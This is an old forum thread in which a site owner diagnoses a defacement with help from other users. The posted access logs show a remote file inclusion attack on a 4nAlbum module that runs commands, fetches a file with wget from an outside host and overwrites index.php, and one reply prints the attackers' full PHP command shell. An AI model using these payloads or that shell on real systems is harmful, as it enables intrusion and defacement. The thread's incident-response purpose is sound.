My site was hacked!

Involved Joined: Dec 28, 2003 Posts: 276 Location: Israel

Raven, could you tell me how they use these apps to change the index.php???

Posted: Fri Jun 04, 2004 4:37 am

stephen2417 wrote:

Well what a motto.. If you do get hacked again then its not an image gallery.. we have rulled that out then. Shocked

Right, i've removed all galeries, and any upload module (except for attach_mod in phpbb. don't tell me this one is suspected too!).

Posted: Fri Jun 04, 2004 4:50 am

Hate to tell you but it very well could be the attachentt mod..

Dont go removing it just yet tho..
Heres a few tips. Find out how the hackers found your site.. By checking your webstats.
And then if you do find something odd then you may have your answer.

But hackers are odd you know.. You never know how they find your site.
Check over your server logs for that time when it was hacked, shouldnt be too had to pin point..

Its just a stab in the dark, im totaly guessing about the attachment mod.. It could be anything these days. You never know. Rolling Eyes

Site Admin/Owner Joined: Aug 27, 2002 Posts: 17088

Look for a URI Requet String (values after the ? mark) that have something like

file=index.php

Posted: Fri Jun 04, 2004 5:03 am

Raven, what about the error i get with the patched admin.php, as i wrote in the 1st page?

Posted: Fri Jun 04, 2004 5:10 am

No idea at this point. I would restore your files, disable all addons/apps that have file upload capability, and search your logs as I stated above. That will tell you how they are getting in.

Posted: Fri Jun 04, 2004 8:48 am

ring_c wrote:

Raven, I had a problem with the FIRST file I've uploaded. Sad

I've started with the root's admin.php file. after replacing (don't worry I have a backup) the file, i got this error:

Fatal error: Call to undefined function: stripos_clone() in /home/hagigim/public_html/admin.php on line 19

Now I'm realy afraid to continue...

The first file you should upload is mainfile.php

Posted: Fri Jun 04, 2004 9:25 am

chatserv wrote:

The first file you should upload is mainfile.php

That's what I thought too... so I've uploaded the admin directory plus the index.php, mainfile.php and other root files. with no vail...
So I removed the patched admin.php and now using the old admin.php.

Posted: Fri Jun 04, 2004 9:26 am

Raven wrote:

Look for a URI Requet String (values after the ? mark) that have something like

file=index.php

I guess you meant url, right, to be found in the access logs. well, non of this was found... Confused

Posted: Fri Jun 04, 2004 9:34 am

Here's something I've founf in my logs, aroung the time the index.php was changed. Does that mean anything to you?

http://www.hagigim.com/modules/4nAlbum/public/displayCategory.php?basepath=http://failiture.webcindario.com/rf.txt?&cmd=id

http://www.online.sh.cn/

1. What's that msnbot?
2. what's that line meaning

Code:

217.132.249.95 - - [04/Jun/2004:00:10:20 -0400] "-" 408 - "-" "-"

?
3.

Posted: Fri Jun 04, 2004 12:45 pm

Code:




200.181.94.89 - - [03/Jun/2004:23:12:09 -0400] "GET http://www.hagigim.com/modules/4nAlbum/public/displayCategory.php?basepath=http://failiture.webcindario.com/rf.txt?&cmd=id HTTP/1.0" 200 1226 "http://www.hagigim.com/modules/4nAlbum/public/displayCategory.php?basepath=http://failiture.webcindario.com/rf.txt?&cmd=id" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"


200.181.94.89 - - [03/Jun/2004:23:18:53 -0400] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://failiture.webcindario.com/rf.txt?&cmd=id;uname%20-a;pwd HTTP/1.1" 200 1409 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"


200.181.94.89 - - [03/Jun/2004:23:20:21 -0400] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://failiture.webcindario.com/rf.txt?&cmd=cd%20/home/hagigim/public_html;ls HTTP/1.1" 200 1771 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"


200.181.94.89 - - [03/Jun/2004:23:20:38 -0400] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://failiture.webcindario.com/rf.txt?&cmd=cd%20/home/hagigim/public_html;wget%20www.dsuspect.hpg.com.br/you.txt HTTP/1.1" 200 1244 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"


200.181.94.89 - - [03/Jun/2004:23:21:19 -0400] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://failiture.webcindario.com/rf.txt?&cmd=cd%20/home/hagigim/public_html;echo%20Rebellious%20Fingers%20-%20rebellious@end-war.com%20>%20index.php HTTP/1.1" 200 1236 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"


200.181.94.89 - - [03/Jun/2004:23:21:31 -0400] "GET / HTTP/1.1" 200 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"


200.181.94.89 - - [03/Jun/2004:23:21:34 -0400] "GET / HTTP/1.1" 200 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"


200.181.94.89 - - [03/Jun/2004:23:21:58 -0400] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://failiture.50megs.com/cse.gif?&cmd=id;uname%20-a;pwd HTTP/1.1" 200 2770 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"


200.181.94.89 - - [03/Jun/2004:23:22:07 -0400] "GET /favicon.ico HTTP/1.1" 404 4173 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"


200.181.94.89 - - [03/Jun/2004:23:22:44 -0400] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://failiture.50megs.com/cse.gif?&cmd=cd%20/home/hagigim/public_html;echo%20Rebellious%20Fingers%20Defacements%20Crew!%20-%20rebellious@end-war.com%20>%20index.php HTTP/1.1" 200 2574 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"


200.181.94.89 - - [03/Jun/2004:23:22:46 -0400] "GET / HTTP/1.1" 200 74 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"


200.181.94.89 - - [03/Jun/2004:23:31:31 -0400] "GET / HTTP/1.1" 200 74 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"


200.181.94.89 - - [03/Jun/2004:23:31:53 -0400] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://failiture.50megs.com/cse.gif?&cmd=cd%20/home;ls HTTP/1.1" 200 2606 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

Look at the lines that start with 200. First, these are Brazilian IPs << notorious for hack attempts. Second, if you look at these lines closely, they are using a vulnerability in your 4nAlbum module to access a file on another server. They are then using http :// failiture.webcindario.com/rf.txt to execute commands on your server.
I don't use 4nAlbum myself, so I cannot direct you to updates. But I would bet that the problem in this instance is 4nAlbum. Hope that helps.

BTW, I took a look at that rf.txt file; here's what's in it.

Code:

<br><font face="verdana" size="2"><center><b>CMD</b> - Rebellious Fingers - We'are: Ackstr0n_X - D3m0n_suspect - Failiture<br></center></font><font face="Verdana" size="1"></center><br>


<b>#</b> CMD PHP : <br>


<b>#</b> Released by : <b>Rebellious Fingers - We'are: Ackstr0n_X - D3m0n_suspect - Failiture</b><br>


<br>


<br>


<hr color="black" width=751px height=115px>


<br>


<pre><font face="Verdana" size="1">


<?


  // CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )


  if (isset($chdir)) @chdir($chdir);


  ob_start();


  system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");


  $output = ob_get_contents();


  ob_end_clean();


  if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));


?>


</font></pre>


<br>


<hr color="black" width=751px height=115px>


<br>


<font face="Verdana" size="1"><b>#RF</b><br><b>@ </b>irc.brasnet.org<br><b># </b>


www.rfcrew.com.br</font><br><b>#</b></font><font face="verdana" size="1"> Rebellious Fingers - We'are: Ackstr0n_X - D3m0n_suspect - Failiture :: 


</font></p>

Posted: Sat Jun 05, 2004 1:38 pm

Thanks, oprime2001.
I've removed 4nAlbum on Friday already.
Do you think I should also ban Brazilian IP from accessing the site?

Oh, and how can you tell wether an IP is Brazilian or other?

Posted: Sat Jun 05, 2004 4:21 pm

ring_c wrote:

Thanks, oprime2001.
I've removed 4nAlbum on Friday already.
Do you think I should also ban Brazilian IP from accessing the site?

Oh, and how can you tell wether an IP is Brazilian or other?

I use Only registered users can see links on this board! Get registered or login! to help identify visitors. You can also use IP-to-country databases (e.g. Only registered users can see links on this board! Get registered or login!) if you want to check specific IP addresses.

As for banning all Brazilian IPs, that's up to you. After getting defaced twice in one month from Brazilian IPs, and since my sites are not geared towards Brazilians anyways, I've personally banned all 200. IP addresses using .htaccess file. Hope that helps.

Posted: Sat Jun 05, 2004 4:24 pm

oprime2001 wrote:

As for banning all Brazilian IPs, that's up to you. After getting defaced twice in one month from Brazilian IPs, and since my sites are not geared towards Brazilians anyways, I've personally banned all 200. IP addresses using .htaccess file. Hope that helps.

Could you please detail how one should do it in the proper manner?
TIA!

Posted: Sat Jun 05, 2004 5:08 pm

Add this line to .htaccess

Deny from 200